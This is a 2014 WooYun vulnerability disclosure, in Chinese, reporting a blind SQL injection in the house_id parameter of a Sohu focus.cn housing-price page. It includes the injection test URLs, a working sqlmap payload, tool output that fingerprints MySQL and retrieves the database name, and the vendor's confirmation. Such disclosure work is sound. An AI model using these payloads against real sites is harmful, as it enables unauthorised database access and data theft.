漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-08-04: 细节已通知厂商并且等待厂商处理中
2014-08-04: 厂商已经确认,细节仅向厂商公开
2014-08-14: 细节向核心白帽子及相关领域专家公开
2014-08-24: 细节向普通白帽子公开
2014-09-03: 细节向实习白帽子公开
2014-09-18: 细节向公众公开
简要描述:
盲注,可获取数据
详细说明:
注入点
http://nj.focus.cn/dmc/houseprice_show.php?house_id=905,参数house_id
http://nj.focus.cn/dmc/houseprice_show.php?house_id=905%27%20and%20%271%27=%271 ,1=1返回正常
http://nj.focus.cn/dmc/houseprice_show.php?house_id=905%27%20and%20%271%27=%27111111,1=111111,返回异常
漏洞证明:
防火墙好像很牛逼的样子,请求数一多就封ip,跑个当前库验证一下
GET parameter 'house_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 120 HTTP(s) requests:
---
Place: GET
Parameter: house_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: house_id=905' AND 5246=5246 AND 'pbUz'='pbUz
---
[10:08:58] [INFO] testing MySQL
[10:08:59] [INFO] confirming MySQL
[10:09:00] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[10:09:00] [INFO] fetching database names
[10:09:00] [INFO] fetching current database
[10:09:00] [INFO] retrieved: njhouse
available databases [1]:
[*] njhouse
修复方案:
过滤
版权声明:转载请注明来源 greg.wu@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2014-08-04 10:36
厂商回复:
感谢对搜狐安全的支持。
最新状态:
暂无